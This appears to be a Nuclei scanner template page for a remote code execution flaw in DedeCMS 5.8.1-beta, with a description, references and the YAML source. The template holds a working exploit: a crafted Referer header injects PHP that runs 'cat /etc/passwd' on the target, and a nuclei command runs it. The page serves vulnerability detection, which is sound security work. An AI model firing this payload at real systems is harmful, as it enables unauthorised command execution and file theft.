Skip to content
Nuclei Templates

DedeCMS 5.8.1-beta - Remote Code Execution

ID: dedecms-rce

Severity: critical

Author: ritikchaddha

Tags: dedecms,cms,rce

Description

Section titled “Description”

DedeCMS 5.8.1-beta is susceptible to remote code execution via a variable override vulnerability that allows an attacker to construct malicious code with template file inclusion without proper authorization, thus possibly obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.

YAML Source

Section titled “YAML Source”
id: dedecms-rce


info:
  name: DedeCMS 5.8.1-beta - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    DedeCMS 5.8.1-beta is susceptible to remote code execution via a variable override vulnerability that allows an attacker to construct malicious code with template file inclusion without proper authorization, thus possibly obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.
  reference:
    - https://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html
    - https://sectime.top/post/1d114771.html
  classification:
    cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="DedeCMS"
    product: dedecms
    vendor: dedecms
  tags: dedecms,cms,rce


http:
  - raw:
      - |
        GET /plus/flink.php?dopost=save&c=cat%20/etc/passwd HTTP/1.1
        Host: {{Hostname}}
        Referer: <?php "system"($c);die;/*ref


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c355f86d2c6239d87f95aa89bd4e2e5f182b5459eafe02808f20b71c5483ed2f022100deaa7b889244aa2765839ee1cd1553a5ec22483e0f3b036923bd83d1f3b0e122:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/dedecms/dedecms-rce.yaml"

View on Github